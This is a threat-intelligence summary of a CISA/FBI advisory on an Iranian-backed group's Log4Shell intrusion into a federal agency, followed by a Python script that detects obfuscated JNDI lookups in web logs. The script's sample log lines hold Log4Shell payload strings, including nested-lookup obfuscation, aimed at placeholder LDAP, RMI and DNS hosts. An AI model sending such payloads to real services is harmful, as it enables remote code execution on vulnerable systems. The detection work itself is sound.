Iranian-backed Threat Actor Exploits Log4Shell Vulnerability
Category: Threat Actor Activity | Industry: Government | Level: Tactical | Source: CISA
A joint advisory from the U.S. government agencies the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) attributed an attack against a Federal Civilian Executive Branch (FCEB) organization to an Iranian-backed threat group. CISA identified signs of compromise as early as February 2022, with suspicious traffic observed by an FCEB-wide intrusion detection system (IDS) named EINSTEIN. The threat actors compromised the organization through the Log4Shell (CVE-2021-44228) remote code execution vulnerability, ultimately leading to the deployment of the XMRig cryptomining malware. During the post-exploitation stages, the threat actors also harvested credentials with Mimikatz, modified Windows Defender settings, set up persistence with a new user account, and created reverse proxies using ngrok. "The threat actors then executed Mimikatz on VDI-KMS to harvest credentials and created a rogue domain administrator account [T1136.002]. Using the newly created account, the actors leveraged RDP to propagate to several hosts within the network. Upon logging into each host, the actors manually disabled Windows Defender via the Graphical User Interface (GUI) and implanted Ngrok executables and configuration files. The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot." CISA and the FBI strongly encourage organizations to patch against the Log4Shell vulnerability, going as far as to say that organizations should assume breach and conduct threat hunting if they have not already done so.
Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- RDP Connection
- Common LSASS Memory Dump Behavior
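The first use case above, hunting for Log4Shell exploitation attempts, is the one that most often trips on obfuscation: scanners nest `${lower:j}`, `${upper:n}` and `${::-x}` lookups inside the `${jndi:...}` string so that a plain substring match on `jndi` misses it. The following is an added example (not Anvilogic's or CISA's code) that normalizes those nested lookups from the inside out before matching, run over a few constructed web access-log lines; the IP addresses, paths and User-Agent values are invented for the demo and are not indicators from the advisory.

```python
import re

# Constructed sample access-log lines (not from the advisory). Line 1 is benign;
# lines 2-4 carry a JNDI lookup in the User-Agent or query string, the last two
# wrapped in the nested-lookup obfuscation commonly seen in Log4Shell scanning.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Feb/2022:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Feb/2022:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '203.0.113.8 - - [10/Feb/2022:12:00:03 +0000] "GET /?x=${${lower:j}${lower:n}di:rmi://192.0.2.11/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.9 - - [10/Feb/2022:12:00:04 +0000] "GET /login HTTP/1.1" 200 10 "-" "${${::-j}ndi:dns://192.0.2.12/c}"',
]

# Innermost ${lower:X} / ${upper:X} lookups (no braces inside, so only leaves match).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")
# Innermost ${anything:-default} lookups, e.g. ${::-j} or ${env:NOPE:-j}; the
# default value is what Log4j substitutes, so that is what we keep.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The JNDI lookup itself, capturing the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested Log4j lookup obfuscation from the inside out.

    Each round rewrites only the innermost lookups; looping until nothing changes
    unwinds arbitrarily deep nesting. max_rounds bounds the work on hostile input.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return one finding per log line that contains a (de-obfuscated) JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append({
                "line": idx,
                "scheme": match.group(1).lower(),
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```

The normalization step is what distinguishes this from a keyword search: lines 3 and 4 contain no literal `jndi` until the nested lookups are resolved. In a real deployment the same function would be applied to any field an attacker controls that a Log4j-based service might log (User-Agent, X-Forwarded-For, request path, form fields), and the scheme captured in each hit is useful for prioritizing, since `ldap` and `rmi` lookups are the ones that fetch remote classes.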